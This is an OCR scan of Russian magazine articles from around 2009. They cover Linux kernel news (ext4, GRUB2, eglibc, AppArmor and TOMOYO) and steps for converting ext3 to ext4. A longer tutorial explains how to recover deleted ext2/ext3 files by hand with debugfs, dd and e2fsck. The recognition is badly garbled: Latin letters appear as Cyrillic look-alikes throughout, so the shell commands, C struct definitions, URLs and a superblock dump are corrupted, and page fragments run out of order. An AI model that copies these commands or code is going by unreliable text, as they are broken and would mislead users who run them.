тво на уровне файловой системы. Это позволило поднять скорость 
выполнения операции и снизить фрагментацию за счет однократно- 
го непрерывного выделения блоков. 

• Больший размер іпосіе. Размер іпосіе увеличен со 128 до 256 
байт, и появилась возможность увеличить точность временных 
меток (время создания и модификации файлов] до наносекунды и 
вместить в іпосіе несколько расширенных атрибутов. Последнее оз- 
начает, что доступ к атрибутам АСЬ, БЕЬіпих, БапгіЬа и другим теперь 
может происходить до 3-7 раз быстрее. 




• Резервирование іпосіе. При создании каталогов файловая систе- 
ма заранее выделяет несколько іпосіе, за которыми в будущем могут 
быть закреплены вновь созданные файлы. Такая техника увеличива- 
ет скорость создания файлов за счет экономии времени на выделе- 
ние для них іпосіе. 

• Группы неиспользуемых іпосіе. Файловая система ехі4 хранит 
информацию о неиспользуемых іпосіе, что позволяетутилите бзск 
обойти эти индексные дескрипторы стороной во время проверки 
файловой системы. Выигрыш в скорости проверки может составить 
от 2 до 20 раз, в зависимости от заполненности файловой системы. 

• Контрольные суммы журнала. ФС ех1:4 хранит контрольные суммы 
для каждой журнальной транзакции. Это делает файловую систе- 
му более надежной в сравнении с ехіЗ, ошибка в журнале которой 
может привести к последующей порче данных во время проверки 
файловой системы. 

• Онлайн-дефрагментация. В будущем планируется реализовать 
возможность «самодефрагментации» файловой системы по мере 
появления в этом необходимости. Пока же доступна специальная 
утилита е4бе1тад, способная дефрагментировать как отдельные 
файлы, так и всю файловую систему. 

• Неограниченное количество подкаталогов. Максимальное коли- 
чество подкаталогов в ехіЗ — 32000. Новая ФС полностью снимает 
это ограничение. 

Несмотря на отсутствие поддержки обратной совместимости в 
самой ФС, драйвер ех1:4 поддерживает прямую совместимость со 
своей предшественницей. ФС ехіЗ можно смонтировать в режиме 
ехі4, используя при этом большинство преимуществ новой ФС. 

НОВЫЙ ЭТАП В РАЗВИТИИ 6КІІВ 

Вместе с пингвином развиваются и средства его загрузки. Еще 
совсем недавно единственным загрузчиком Ыпих был неуклюжий, 
но хорошо справляющийся со своими задачами ИЬо. Позднее его 
сменил пришедший из мира СІЧІІ/НигсІ «многоцелевой» дгиЬ, кото- 
рый по уровню функциональности вполне мог потягаться с первыми 
версиями операционной системы М5-005. 

Хотя в дальнейшем развитии дгиЬ не было никакой насущной 
необходимости, разработчики продолжали совершенствовать свой 
продукт, наводить блеск, повышать эффективность и исправлять 
ошибки. В результате на свет появился дгиЬ2. Это загрузчик нового 
поколения, который обладает следующими достоинствами: 

• Поддержка скриптинга, включая условия, циклы, переменные и 
функции. 

• Графический интерфейс. 

• Динамическая загрузка модулей (дает возможность расширения 
загрузчика во время работы, а не во время компиляции]. 

• Портабельность на множество архитектур. 

• Интернационализация. Поддержка не-А5СІІ кодировок, каталоги 
сообщений по типу дейехД шрифты, графические консоли и т.д. 

• Настоящее управление памятью (делаетзагрузчик более расши- 
ряемым]. 



НАЗАД В ПРОШЛОЕ: 

КОМАНДНЫЙ 
ИНТЕРПРЕТАТОР В ЯДРЕ 

Шіх стал первой операционной системой, командный интерпретатор 
которой был вынесен в отдельный процесс. Май Капоп решил вернуть все 
на прежние места и представил патч с реализацией интерфейса командной 
строки в ядре Ілпих. Ксіі базируется на библиотеке НЪсН и предназначен для 
применения в монолитных образах Ыпих для встраиваемых систем. 



• Модульный, иерархический, объектно-ориентирован- 
ный фреймворк для файловых систем, файлов, дисков, 
терминалов, команд, таблиц разделов и загрузчиков ОС. 

• Кросс-платформенная установка (позволяет инстал- 
лировать дгиЬ с разных архитектур]. 

• Спасательный режим для «незагружаемых случаев». 

• Избавление от Біаде 1.5. 

• Исправление ошибокдизайнадгиЫ, которые не мог- 
ли быть решены с сохранением обратной совместимос- 
ти (например, способ именования разделов]. 

Сточки зрения рядового пользователя дгиЬ2 интере- 
сен красивым внешним видом, поддержкой различных 
шрифтов и полностью автоматизированным процессом 
настройки. Впечатляет, что варианты графического 
оформления — не просто шкурки, а совершенно разные 
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системы меню. Они могут коренным образом отличаться 
друг от друга. Загрузчик стал гораздо умнее: конфи- 
гурационный файл /Ьооі/дгиЬ/дгиЬ.сбд теперь содер- 
жит прямое упоминание о том, что вместо его ручного 
редактирования следует воспользоваться командой 
ирбаіе-дгиб. Команда сама найдет все установленные 
операционные системы и подсобные самодостаточные 
утилиты (тетІезі86, например] и добавит их в конфигу- 
рационный файл. 

В новой версии код загрузчика разбит на множество 
модулей, которые могут быть загружены в любой момент. 
Эіаде 1 .5 (второй компонент бутлоадера, располагаю- 
щийся в начале файловой системы], наконец, остался 
в прошлом, благодаря чему д гиб стал более гибким и 
устойчивым ксбоям. 

ОСОБОЕ МНЕНИЕ РАЗРАБОТЧИКОВ 
ОЕВІАИ 

В отличие от ВЗО-систем, большинство компонен- 
тов которых развивает одна команда разработчиков, 
дистрибутивы Итих держатся на кирпичиках, создан- 
ных независимыми командами. Дворец, именуемый 
«операционная система Ыпих», построен огромным 
количеством людей, и каждый из них имеет собствен- 
ное представление об удобстве, стиле и подходе к 
написанию приложений. Такая ситуация доставляет 
множество проблем создателям дистрибутивов, но 
зато оставляет право выбора (не нравится — приготовь 
сам]. Разработчики дистрибутива Оебіап воспользо- 
вались этим правом, чтобы заменить один из главных 
компонентов ОС Ыпих — стандартную библиотеку 
языка Си. 

Это может показаться странным, но мантейнеры на- 
иважнейшего компонента ОС Ыпих, библиотеки діібс 
(С N11 С Ы Ь гагу], умудрились довести свою разработку до 
такого состояния, что недовольным пришлось создать 
собственную группу поддержки их продукта. Стартовав- 
ший совсем недавно проект едіібс занялся поддержкой 
особой версии діібс, которая бы нетолько решала 
проблемы сопровождения библиотеки, но и позволяла 
использовать ее во встраиваемых системах. Проект был 
быстро взят на вооружение мантейнерами Оебіап. Их 
аргументы были более чем весомы: 

• Более открытое сообщество разработчиков. 



• Развивающаяся стабильная ветка, в которой регуляр- 
но происходит исправление ошибок (в случае с діібс 
разработчикам дистрибутивов приходится подде- 
рживать собственные ветки библиотеки, содержащие 
багфиксы]. 

• Поддержка встраиваемых систем (діібс ориентирована 
на десктопы и серверы]. 

• Поддержка множества командных интерпретаторов 
(діібс поддерживаеттолько базб). 

• Возможность сборки библиотеки с оптимизацией по 
размеру (флаг дсс ‘-Оз’]. 

• Пибкая система настройки, позволяющая исключить 
ненужные компоненты библиотеки. 

Библиотека едіібс полностью бинарно совместима с 
діібс и уже используется другим известным проектом 
ОрепѴѴгІ ( орепѵѵгі.огд ]. 

БОРЬБАЗА БЕЗОПАСНОСТЬ 

В начале 2006 года компания N оѵе И анонсировала 
новую систему создания политик безопасности для 
приложений. Проект получил имя АррАгтог и был на- 
целен на тех пользователей и системных администра- 
торов, которым требовалась бол ее удобная и простая 
в сопровождении альтернатива 5ЕІ_іпих. Однако, к 
несчастью компании, АррАгтог не смог составить 
достойной конкуренции БЕбіпих, и N оѵе II пришлось 
отказаться от применения новой разработки в своих 
дистрибутивах. 

Провал АррАгтог не был вызван головотяпством 
маркетологов N оѵе И. Причины неудачи носили чисто 
технический характер. Одной из них был неэффектив- 
ный, по мнению специалистов, способ привязки поли- 
тик безопасности к файловому пути (а не к объекту, как 
это сделано в БЕИтих]. Другая проблема — костыли 
в коде, которые пришлось нагородить, потому что 
механизм ЕБМ [ЕіпихБесигіІуМосІиІез] не предусмат- 
ривал возможности привязки действий по обеспе- 
чению ограничений приложения к файловому пути. 
Мантейнеры Еіпих-ядра обозвали присланные N оѵе II 
патчи кашей, которую просто некошерно включать в 
основной код. 

Несмотря на все это, идея привязки политик безо- 
пасности к файловому пути была слишком лакомым 
кусочком, чтобы кто-то другой не заинтересовался ей 




> іпіо 

• Несмотря на все 
достоинства 

и уникальные черты, 
файловая система 
ех1:4 — не долгосроч- 
ное решение, а лишь 
промежуточный шаг 
на пути к бігіз, файло- 
вой системе нового 
поколения, которая 
должна стать офи- 
циальной ФС Иі п их 
через несколько лет. 

• В рамках акции по 
защите австралий- 
ского Тасманского 
Дьявола отвымира- 
ния, Итих-ядро вер- 
сии 2.6.29 получило 
новый логотип, на ко- 
торый ты можешь по- 
любоваться, открыв 
файл Ооситепіаііоп/ 
Іодо.зѵд. 
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КРИТИКА ЕХТ4 



Многочисленные техники, направленные на увеличение произ- 
водительности новой файловой системы, сыграли злую шутку с ее 
создателями. Резкая критика обрушилась в их адрес после вклю- 
чения поддержки ехг4 в дистрибутив ІЛшпт. Суть проблемы за- 
ключалась в следующем: благодаря отложенному распределению 
и увеличению периода сброса данных на диск, между созданием 
нового файла и его фактической записью на диск могло проходить 
до 150 секунд. Если в течение этого периода происходило отклю- 
чение питания компа, файл бесследно исчезал. Разработчики 
ехг4 сняли с себя ответственность, сказав, что подобным образом 
ведет себя любая современная ФС (ХР5, Кеізег4), а пинать следует 
разработчиков приложений, которые не заботятся о выполнении 
системного вызова $упс() после записи важных данных. В пример 
был поставлен редактор етасз, который никогда не теряет файлы 
на ехг4. 




ЕСЫР5-ПЛАГИН ДЛЯ РЕДАКТИРОВАНИЯ ПОЛИТИК 
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конфигуратор политиктомоѵоиыих 



и не попытался реализовать вновь. Одними из таких людей стали 
разработчики МАС-системы Т0М0У0 І_іпих ( е1.іпих.огд/Топпоѵо1_іпих ). 
Пройдя долгий и тернистый путь, сопровождаемый множеством 
переработок дизайна, они добились-таки включения своей раз- 
работки в ядро версии 2.6.30. Набор модулей ядра Т0М0У0 І_іпих 
очень похож на АррАгтог, но концептуально более изящен. Он прост 



МИГРИРУЕМ 

НА ЕХТ4РБ 

Сейчас мы разберемся, как перейти на ехг4 без потери данных. 
Сразу должен предупредить: после выполнения приведенных 
действий ехгЗ-раздел больше нельзя будет смонтировать как 
ехгЗ — только как ехг4! Открой терминал и набери: 

# Сипе2:Ез -О ехСепСз ,ипіпіЬ_Ьд, <ііг_іпс1ех /сіеѵ/им я уст- 
ройства 

На момент ввода этой команды устройство должно быть размон- 
тировано. Если требуется преобразовать корневую файловую 
систему в ехг4, то команду следует вводить с ІіѵеСО. 

После этого проверим файловую систему: 

# Ізск -рі: /сіеѵ/им я устройства 

Монтирование производится следующим образом: 

# тоипС -Ь ехС4 /сіеѵ/имя устройства /точка_монтирования 

# шоипС -С ехР4 /Цеѵ/Цізк/Ъу-ииісІ/ШІВ-устройства /точ- 
ка_монтирования 

Если раздел автоматически монтируется через /еГс/ІзГаЪ, не 
забудь исправить файловую систему на ехг4: 

ШІБ=ШІБ-раздела /точка ехС4 

ЦеІаиІЬз , еггогз=гешоипС-го , геІаСіте 0 1 

Если ты изменил тип файловой системы корневого раздела, 
то необходимо отредактировать файл /Ъоог/^гиЪ/тепи .І5Г и 
добавить опцию «гоогбзгуре = ехг4» в список параметров ядра. 
Например: 

СіЫе Ъіпих 
гооС (МОД) 

кегпеі /ЪооС/ѵт1іпи2-2 . 6 . 28 . 1 гоок=ШІБ=8791797с- 
944с1-4с2 8-а72 0-24973 07 05714 го диіек зрІазЬ. 
гооіДзЦуре=ехІ:4 

іпіСгс! /Ъоок/іпіСгсІ. ішд-2 . б . 2 8 . 1 
диіек 

Денис Колисниченко (бЬ5ІІаЪ5@таі1.ги, ѵѵѵуѵѵ.сікѵуз.ог^.иа), 
автор многих книг и статей, посвященных Ііпих. 



в использовании и поддерживает режим обучения, однако пока не 
представляеттой гибкости, которой обладает ЗЕЫпих. 

Другая система обеспечения безопасности, принятая в ядро версии 
2.6.30, была разработана сотрудниками ІВМ. Она представляет со- 
бой инфраструктуру для контроля целостности исполняемых файлов. 
Ее следует использовать совместно с ЗЕЫпих или 50т (Зітріе Ыпих 
I піед гііу Мобиіе — простая реализация песочницы, используемая в 
серверном ПО ІВМ). 

Система предоставляет набор средств, которые позволяют при- 
вязать цифровую подпись и контрольную сумму к любому файлу. 
Если злоумышленник получит прямой доступ к машине и сможет 
воспользоваться ЫѵеСВ для модификации файлов основной сис- 
темы, система заблокирует доступ к измененным файлам после 
следующей загрузки. ц-ц 
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Игры меняются, 
датѳіапсііи остается! 
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БЛОКИ 

С КОСВЕННОЙ 
АДРЕСАЦИЕЙ 




БЛОКИ 
С ДВОЙНОЙ 
КОСВЕННОЙ 
АДРЕСАЦИЕЙ 



МАКСИМ «НАТСНЕТ» ПОЛЕВОЙ 

/МАК5.НАТСНЕТгаѴА№ЕХ.КУ/ 



ОПЕРАЦИЯ 
« РЕИНКАРНАЦИЯ » 

Ручное восстановление данных в Цпих 



Восстановить удаленные файлы с помощью специальн ых про- 
грамм может даже учитель информатики, а вот проделать ту же 



операцию путем ручного редактирования управляющих структур 
файловой системы способен далеко не каждый. В экстремальной 
ситуации нужного софта может не оказаться под рукой. 

Придется полагаться только на себя и собственные знания. 



Сегодня мы поговорим о ручном восстановле- 
нии файлов сфайловыхсистем ехі2 и ехіЗ. Сра- 
зу хочутебя предупредить, что ничего сложного 
в этом нет. Дизайн официальных файловых сис- 
тем І_іпих очень прости понятен даже новичку. 
Все, что оттебя потребуется — внимательность 
и голова на плечах. 

Следующиедва раздела посвящены тому, как 
организовано хранение файлов в ехі2/3, и что 
происходит, когда пользователь выполняет 
команду гт. Последующие разделы описывают 
технику восстановления, основанную на инфор- 
мации первых двух. 

АНАТОМИЯ ФАЙЛОВОЙ 
СИСТЕМЫ ЕХТ2/ЕХТЗ 

В начале раздела расположен Ьооі-сектор дли- 
ной 1024 байта. Он используется некоторыми 
загрузчиками для хранения своей второй части 
(например, СгиЬзаписываеттуда код 5іаде 1 .5). 
Далее следует супер-блок, в котором хранится 
ключевая информация о структуре файловой 
системы (своего рода главный конфиг). Чтобы 
прочитать информацию супер-блока, запусти 
следующую команду: 



# Ршіе2:Ез -1 /беѵ/МаІ 

Ты увидишь массу информации, отражающей 
текущее состояние файловой системы, а также 
значения, заданные при ее создании и неизме- 
няемые со временем. Одно из таких значений 

— «Віоскзіге», которое, скорее всего, будет 
равно 4096, то есть 4 Кб. Это размер одного 
блока файловой системы, базовой неделимой 
единицы хранимой информации. Все, что 
находится в ФС, разбито на огромное количест- 
вотаких блоков, и даже если размер файла 
меньше размера блока, для его хранения будет 
использован целый блок, а большие файлы 
могут занимать сотни тысяч блоков. Общее ко- 
личество блоков файловой системы прописано 
в поле«В1осксоип1», а количество свободных 

— во«Ргее Ыоскз». 

Сразуза супер-блоком следуют дескрипторы 
групп и карты свободного пространства (битма- 
пы], на которых мы не будем останавливаться. 

А вот расположенная сразуза ними іпобе- 
таблица вызываетособый интерес, потому 
какименноона является централизованным 
хранилищем всей информации о каждом файле. 



Таблица представляет собой массив структур 
типа ехі2_іпосІе, размер которого задается 
во время создания файловой системы и не 
изменяется со временем (смотри поле «Іпобе 
Соипі» супер-блока]. Каждый элементэтого 
массива описывает один файл и хранит та кую 
информацию, кактип (обычный, каталог, ссылка 
ит.д.], схема размещения на диске, логический/ 
физический размер, дата/время создания/ 
модификации/последнего доступа/удаления, 
количество ссылок на файл и права доступа. 
Структура ехі2_іпосіе, выступающая в роли 
элемента массива, определена в файле зоигсе/ 
іпсІисІе/Ііпих/ехі2_^5.Ь и выглядиттак: 



Структура іпосіе 

збгисб ехб2_іпос1е { 

/* Режим доступа к файлу */ 

иіб і_тос!е; 

/* 1ЛБ владельца файла */ 

иіб і_иі<3; 

/* Размер файла в байтах */ 

и32 і_зіге; 

/* Время последнего доступа */ 
и32 і_абіше; 
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^ ипіхоігі 



Рііезузіет ѵоіите пате: 
іа$* тоип^ей оп: 
Рііеаузіет ІШО: 
Рііегузіет шадіс питЬег: 
Рі1е5у5Іет геѵІБІоп #: 
Рііеаузііет ^еаіигез: 
Темуре зраг5е_5ирег 1агде_ 
Рііеэузііет Л ад б: 

ОеРаиІІ: тоипг оріпопз: 
РіІевуБІет зіаіе: 

ЕггогБ ЬеИаѵіог: 
РіІеауБГет 05 Туре: 

Іпосіе соипт: 
віоск соипт: 

Кезегѵесі Ыоск еоипТ: 

Ргее Ыоскз: 

Ргее іпосіе 5 : 

Рі гбТ Ыоск: 

Віоск 5Іге: 

РгадтепТ зіге: 

КезегѵесІ сот Ыоскз: 
Віоскз рег дгоир: 

РгадтепТз рег дгоир: 

Іпосіез рег дгоир: 

Іпосіе Ыоскз рег дгоир: 
РіІезузТет сгеаТеа: 

ЕазТ ггоипТ Тіте: 

ЕазТ ѵѵгіТе Тіте: 
моипТ соипт: 
махітиш тоипт соипт: 
тазт сНескесІ: 

СИеск іпТегѵаІ: 

ЫехТ сЬеск аТТег: 

Кезегѵесі Ыоскз иісі: 
Кезегѵегі Ыоскз дід: 

Рі гзТ і посіе : 

Іпосіе зіге: 




<попе> 

<пот аѵаі!аЫе> 

141с0408-43еЗ-4Ыа-ЬЗсІ7-4а79асс24Ьасі 

ОхЕР53 

I (гіупатіс) 

Иаз іоигпаі ехТ_аТТг гезІ 2 е_і посіе сИг_іпсІех Ті 
.'Рі 1е 

зідпес!_с1і гесТогу_ИазН 

(попе) 

сіеап 

соптіпие 

Тіпих 

594512 

2373595 

118679 

1808032 

481214 

О 

4096 
4096 
579 
32768 
32768 
8144 
509 

Мол Іип 
Тие Зип 
Мол Зип 
5 

38 

мол Зип 1 21:27:13 2009 
15552000 (6 топтИз) 

5аТ Ыоѵ 28 20:27:13 2009 
0 (изег гооТ) 

0 (дгоир иПееІ) 

II 
256 



1 21:27:13 2009 

2 04:23:26 2009 
1 23:48:01 2009 



ДАМП СУПЕР-БЛОКАС ПОМОЩЬЮ 01ІМРЕ2Р5 



/* Время создания */ 

и32 і_сЬіте; 

/* Время модификации */ 

и32 і_тЬіте; 

/* Время удаления */ 

и32 і_сЩіте; 

/* СІБ группы */ 

иіб і_дісІ; 

/* Количество ссылок на файл (0 — 
файл удален) */ 

иіб і_1іпкз_соипЬ ; 

/* Количество блоков, принадлежа- 
щих файлу */ 

и32 і_Ыоскз; 

/* Разные флаги */ 

и32 і_Ыадз; 

/* Зависимые от ОС значения */ 
ипіоп озсіі; 

/* Ссылки на блоки */ 

и32 і_Ыоск [ЕХТ2_Ы_ВЬОСКЗ] ; 

/* Версия файла (используется 
БЕЗ) */ 

и32 і_ѵегзіоп; 

/* АСЬ-атрибуты файла */ 

и32 І_1і1е_ас1; 

/* АСЬ-атрибуты каталога (наследу- 
ются во время создания файла) */ 

и32 і_біг_ас1; 

/* Положение последнего фрагмента */ 
и32 і_1аббг; 

/* Зависимые от ОС значения */ 
ипіоп озс12 ; 

} ; 

Меііпе ЕХТ2_БІК_ВЬОСКЗ 12 



#беііпе ЕХТ2_ШЬ_ВЬОСК ЕХТ2_ЫК_ 
ВЬОСКЗ 

Меііпе ЕХТ2_БІШ_ВЬОСК (ЕХТ2_ІШ_ 
ВЬОСК + 1) 

#беііпе ЕХТ2_ТШБ_ВЬОСК (ЕХТ2_БШБ_ 
ВЬОСК + 1) 

Меііпе ЕХТ2_Ь_ВЬОСКЗ (ЕХТ2_ТШБ_ 
ВЬОСК + 1) 

Ссылки на закрепленные за файлом блоки 
хранятся в массиве і_Ыоск, первые 12 элемен- 
тов которого представляют собой 32-битные 
адреса первых 1 2 блоков файла. Их называют 
блоками с прямой адресацией. Тринадцатый 
элемент массива хранит ссылку на блок, храня- 
щий адреса следующих блоков данных («блок 
косвенной адресации»]. Четырнадцатый 
элемент массива — ссылка на блок, хранящий 
ссылки на блоки косвенной адресации («двой- 
ной блоккосвенной адресации»]. И, наконец, 
в 1 5 элементе массива хранится ссылка на 
блок, содержащий ссылки на блоки двойной 
косвенной адресации. 

Такая вот путаная (но эффективная] древовид- 
ная схема размещения данных в файловых 
системах ехі2 и ехіЗ. При этом блоки косвенной 
адресации не обязательно должны следо- 
вать другза другом, для файловой системы 
— это точно та кие же блоки данных. Для их 
распределения используется стандартный 
механизм, который может вернуть ссылку на 
блок, расположенный в любой точке разде- 
ла. В результате схема размещения данных 
файла может оказаться разбросанной по всему 



разделу. Это хорошо для устойчивости файла к 
разрушению, но плохо сточки зрения простоты 
его последующего восстановления. 

Имена файлов хранятся в каталогах, которые 
на самом деле есть не что иное, какфайлы 
специального типа. В каталогзаписана после- 
довательность структуртипа е хі 2_сІ і г_е п 1; гу_2 
(или ехі2_сІіг_еп1;гу в старых ядрах], которая 
выглядит следующим образом: 

СТРУКТУРА КАТАЛОГОВОЙ ЗАПИСИ 

зЬгисб ехЬ2_с!іг_епЬгу_2 { 

/* Ссылка на іпосіе */ 

и32 іпосіе; 

/* Длина данной записи */ 

иіб гес_1еп; 

/* Длина имени файла */ 

и 8 паше_1еп; 

/* Тип файла */ 

и 8 іііе_Ьуре; 

/ * Имя файла * / 

сПаг паше [ЕХТ2_ЫАМЕ_ЬЕЫ] ; 

} ; 

#беііпе ЕХТ2_БАМЕ_ЬЕЫ 255 

Когда приложение выполняетсистемный вы- 
зов ореп(] или сгеаШ для создания файла, ядро 
заполняетсвободный іпосіе в іпобе-таблице 
новыми данными. Затем добавляет в текущий 
каталог новую записьтипа ехі2_сІіг_епІгу_2, 
записываетв нее имя файла (поле пате], его 
тип (ііІе_іуре] и помещает ссылку на созданный 
іпосіе в одноименное поле. В итоге, пройдя 
по цепочке структур и массивов в обратном 
порядке, можно быстро найти данные, закреп- 
ленныеза файлом — пока онжив. 

КАК ПРОИСХОДИТ 
УДАЛЕНИЕ ФАЙЛА 

В общих чертах процедура удаления (разлин- 
ковки] файла выглядит следующим образом. 
Драйвер файловой системы определяет 
каталог, за которым за креплен удаляемый файл 
и находит іпосіе файла в последовательности 
структуртипа ехі2_сІі г_епігу_2. После чего 
отыскивает нужный іпосіе в іпобе-таблице и 
уменьшаетего счетчикссылок(і_Ііпк5_соип1:] 
на единицу. Если счетчик не становится равен 
нулю, удаления не происходит (ссылка на файл 
могла остаться в другом каталоге]; в противном 
случае — пишите письма, драйвер приступает 
к грязной работе. Все принадлежащие файлу 
блоки помечаются как неиспользуемые в карте 
свободного пространства. Обновляется поле 
времени удаления, и іпосіе освобождается. В 
конце концов, драйвер обнуляет поле іпосіе 
файла в файле каталога и увеличивает длину 
предыдущей записи на размерудаляемой 
(именно для этого нужно поле гес_1еп). 
Нетрудно заметить, что фактического удаления 
информации не происходит. Болеетого, і посіе 
файла остается на месте и продолжаетхранить 
всю информацию обудаленном файле. Ссылки 
на блоки данныхтакже остаются на месте, но 
сами блоки помечаются как неиспользуемые, 
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• Для исследования 
файловой системы 
ехі2 необязатель- 
но использовать 
стандартную утилиту 
сіебидбз. Есть более 
дружественная 

и наглядная 
альтернатива под 
названием ЮЕ 
(Ыпих Оізк ЕсІ ііог, [бе. 
зоигсеЬгде.пеі ]. 

• Файловая система 
ехі2 была спроекти- 
рована по образу 

и подобию ІЧЕ5 (ІІпіх 
Еі Іе Бузует], поэтому 
ты легко вникнешь 
в тему, если захочешь 
разобраться в осо- 
бенностях восстанов- 
ления файлов 
в В50-системах. 

• Существует 
множество утилит, 
автоматизирующих 
процесс восстанов- 
ления данных 

в файловых системах 
ех1:2 и ехіЗ, наиболее 
функциональные из 
которых: ТезШізк 
( ѵѵѵѵѵѵ.сдзесигКѵ. 
огд/ѵѵікі/ТезШізк ). 
ипбеіеіе ( ѵѵѵѵѵѵ.зіиб. 
і:и-і[тепаи.бе/~ппо]о/ 
ипбеІеІе.ЫтІ ) и 
зІеиіЬкіІ [ ѵѵѵѵѵѵ. 
зІеиіЬкіЕогд ]. 



В СТРАНЕ МЕРТВЫХ 

Чтобы избежать перезаписи блоков удаленного файла, вос- 
становление следует начать с немедленного размонтирова- 
ния раздела. Если же файл находился на корневом разделе, 
лучшее средство — кнопка ВЕЗЕТ на системном блоке и 
последующая загрузка с ЕіѵеСО. 

Для низкоуровневой навигации по файловой системе 
необязательно использовать шестнадцатеричный редактор, 
су ще ству ет н е с ко л ь ко ути л ит, кото рыеоблегчают этот про- 
цесс. Одна из них — стандартная команда бебиді'з из пакета 
е2і : 5ргод5. 

Запусти ее суказанием раздела, содержащего подопытную 
файловую систему: 

$ сіеЪидіз /сіеѵ/зсіаі 

Откроется командная строка, которая принимает множество 
команд. Набери Ьеір, чтобы увидеть их. Наиболее интерес- 
ные для нас команды: Ізсіеі, зіаЦ саі и битр. Команда Ізсіеі 
показывает все удаленные іпосіе. Выполни ее: 

сІеЪидіз: Ізсіеі 

Скорее всего, список будет очень длинным, поэтому лучше 
сразу перенаправить его в файл: 

$ есію Ізсіеі I сіеЬидІз /сіеѵ/зсіаі > /Сшр/Ізсіеі . 
оиС 

Открой полученный файл и попытайся найти разыскива- 
емого по времени удаления, размеру, владельцу и другим 
данным. Запомни номер его іпосіе и выполни команду зіаі в 
командной строке сіебидіз: 

сіеЬидІз: зСаС <номер_іпосіе> 

На экране появится вся информация об іпосіе (номер, 
тип, владелец, время создания и удаления и п р . ) . В 
конце вывода будет присутствовать информация о 
блоках, занимаемых файлом на диске, и их количест- 
во. На основе этих данных можно восстановить любой 
файл, воспользовавшись командой бб в качестве 
инструмента. Но есть более простой способ. Команда 
битр делает снимок всех блоков, принадлежащих 
у казанномуіпобе, и записывает их в у казанный файл. 
Попробуй : 

сіеЬидІз: сіигпр -р <номер_іпос1е> /Стр/восстанов- 
ленный_файл 



Ключ ‘-р’ сохраняетза файлом прежние права доступа, вла- 
дельца и группу. Имя файла придется подобрать по памяти, 
оно хранилось в каталоге и было затерто во время удаления. 
Еслиты ищешь текстовый файл, то для полной уверенности 
лучше сначала выполни команду саі над іпобе, которая 
выведет содержимое файла прямо на экран: 

сІеЬидІз: сак <номер_іпосІе> 

Чтобы идентифицировать файл после его восстановления, 
можешь применить утилиты іііе и зігіпдз. Первая покажет 
тип файла, а вторая выведет на экран все читаемые строки, 
которые он содержит. 

Для восстановления утраченных файлов необязательно 
делать их дамп в существующую файловую систему, — можно 
изменить саму іпобе-таблицу. Сделать это просто. Открыва- 
емдисковый раздел (или его снимок] в режиме записи: 

# сіеЬидІз -ѵі /сіеѵ/зсіаі 

Находим описанным выше способом іпобеудаленного фай- 
ла и открываем его на редактирование: 

сіеЬидІз: ші <номер_іпосіе> 

Команда ті расшифровывается как«тоббу іпобе» и пред- 
назначена для ручного редактирования іпобе. Она выводит 
на экран все поля іпобе и ихтекущие значения, заключен- 
ные в квадратные скобки. Курсор будет останавливаться 
у каждого поля, ожидая ввода нового значения, которое 
можно пропустить, нажав <ЕпІег>. Нас интересуеттолько два 
поля: время удаления (Оеіебоп бте] и количество ссылок 
(ИІпк соипі]. Первое следует обнулить, а второму присвоить 
значение І.Такмы вернем мертвый файл кжизни, но введем 
файловую систему в скомпрометированное состояние: файл 
есть, но найти его невозможно (запись каталога, содержа- 
щая его имя и ссылку на іпобе, уже затерта). Сточки зрения 
файловой системы это ошибка, которая дает нам два вари- 
анта последующихдействий. 

Мы можем запустить Ізск, который найдет несоответствия в 
файловой системе и исправит их, поместив наших призра- 
ков в каталог ІозЫоипб: 

# е21зск -1 /сіеѵ/зсіаі 

Или же воспользоваться методом прямого вмешательства: 
создать жесткую ссылку на файл, используя команду Ііпк 
утилиты бебидіз: 

сіеЬидІз: Ііпк <номер_іпосіе> восстановлен - 
ный_файл 

Восстановленный файл появится в текущем каталоге. Одна- 
ко команду е21зск придется запустить и в этом случае, потому 
какзакрепленныеза файлом блоки до сих пор помечены как 
неиспользуемые. 

КАК БЫТЬ С ЕХТЗ? 

Как мы уже упоминали, Еіпих-драйвер ехіЗ использует 
другой механизм разлинковки. Он затирает всю таблицу 
соответствия в іпобе, делая процесс восстановления 
данных чрезвычайно трудным, если не сказать невоз- 
можным. Но попробуем мыслить логически. Файл пред- 
ставляет собой последовательность блоков определен- 
ного размера, разбросанных по всему жесткому диску. У 
каждого типа файла есть набор признаков, по которым 
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его можно идентифицировать. Любой медиа-файл (изоб- 
ражение, аудио, видео — неважно] имеет заголовок, в 
котором в большинстве случаев размещен не только его 
тип и размер, но и сведения об авторе и времени созда- 
ния (ібЗ-теги в трЗ, например]. Текстовые файлы сразу 
бросаются в глаза, благодаря своему читаемому без 
специальных средств содержимому. НТМІ_, ООС и другие 
документы, напичканные высокоуровневыми системами 
разметки, также имеют заголовок и набор узнаваемых 
признаков. 

Учитывая это, можно смело утверждать, что найти и 
восстановить удаленный файл на не слишком фраг- 
ментированной и захламленной файловой системе 
возможно даже после полного разрушения ее управ- 
ляющих структур. В том случае, если файл был записан 
в непрерывную последовательность блоков, все, что 
потребуется сделать, — найти усопшего по метаданным 
(которые будут указывать на его начало], извлечь из них 
размер файла и вернуть бедолагу кжизни с помощью 
команды бб. 

Однако описанный прием сработаетлишь в очень неболь- 
шом проценте случаев (например, файл, удаленный на 
только что созданной ФС]. В остальных 99% файл окажется 
сильно фрагментирован; части убитого будут разбросаны 
по всей файловой системе, а на сбор их в единое целое 
придется потратитьуйму времени и нервов, ато и вообще 
смириться сутратой. 

Ситуация не была бы столь плачевной, если бы не 
размеры современных дисков и файловых систем. Дело 
в том, что метаданные многих типов файлов хранят 
еще и контрольную сумму самих данных. Для восста- 
новления информации с небольшого носителя начала 
90-х мы могли бы воспользоваться знаниями языка Си 
и написать программу, которая находила бы первый 
блок файла по его метаданным и определяла размер. А 
затем — просто подбирала остальные свободные блоки 
файловой системы в надежде составить весь файл, кон- 
трольная сумма которого будет правильной. К сожале- 
нию, если применить такую программу к современному 
хранилищу данных, мы дождемся скорее выхода из 
строя жесткого диска (вследствие износа), чем реин- 
карнации файла. 

Но отчаиваться не стоит! Небольшиетекстовые файлы, такие 
какбазы паролей, легко умещаются в один блокфайловой 
системы, и найти их можно с помощью обычного дгер: 



іпосіе: 2345 туре: зутііпк мосіе: 0777 Ріадз: 0x0 

сепегагіоп: 2812357980 ѵегзіоп: 0x00000000 

115ег: 0 Огоир: 0 5іге: 27 

Рііе ась: 0 оігесгогу асі: О 

Ппк5: 1 віосксоипі: О 

РгадтепТ: АсісІгеБз: 0 кіитЬег: 0 5І2е: О 

сііте: 0х4а23^948 -- моп Зип 1 21:52:40 2009 

